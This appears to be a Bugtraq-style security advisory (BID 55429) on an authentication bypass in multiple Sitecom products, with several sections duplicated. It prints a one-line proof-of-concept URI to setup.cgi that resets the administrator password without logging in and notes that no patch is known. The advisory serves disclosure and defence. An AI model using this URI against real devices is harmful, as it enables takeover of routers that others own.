Multiple Sitecom Products Admin Password Change Authentication Bypass Vulnerability
BID:55429
Info
Multiple Sitecom Products Admin Password Change Authentication Bypass Vulnerability
| Bugtraq ID: | 55429 |
| Class: | Design Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Sep 06 2012 12:00AM |
| Updated: | Sep 06 2012 12:00AM |
| Credit: | Mattijs van Ommeren |
| Vulnerable: | |
| Not Vulnerable: | |
Discussion
Multiple Sitecom Products Admin Password Change Authentication Bypass Vulnerability
Multiple Sitecom products are prone to an authentication-bypass vulnerability because it fails to restrict unauthenticated access.
Successful exploits may allow attackers to bypass security restrictions and change the administrator password.
Multiple Sitecom products are prone to an authentication-bypass vulnerability because it fails to restrict unauthenticated access.
Successful exploits may allow attackers to bypass security restrictions and change the administrator password.
Exploit / POC
Multiple Sitecom Products Admin Password Change Authentication Bypass Vulnerability
An attacker can carry out this attack using a browser.
The following example URI is available:
http://www.example.com/cgi-bin/setup.cgi?ChgSystemStatus&hackedSitecom&workgroup&<password>
An attacker can carry out this attack using a browser.
The following example URI is available:
http://www.example.com/cgi-bin/setup.cgi?ChgSystemStatus&hackedSitecom&workgroup&<password>
Solution / Fix
Multiple Sitecom Products Admin Password Change Authentication Bypass Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of any more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of any more recent information, please mail us at: [email protected].
References
Multiple Sitecom Products Admin Password Change Authentication Bypass Vulnerability
References:
References:
- Sitecom Homepage (Sitecom)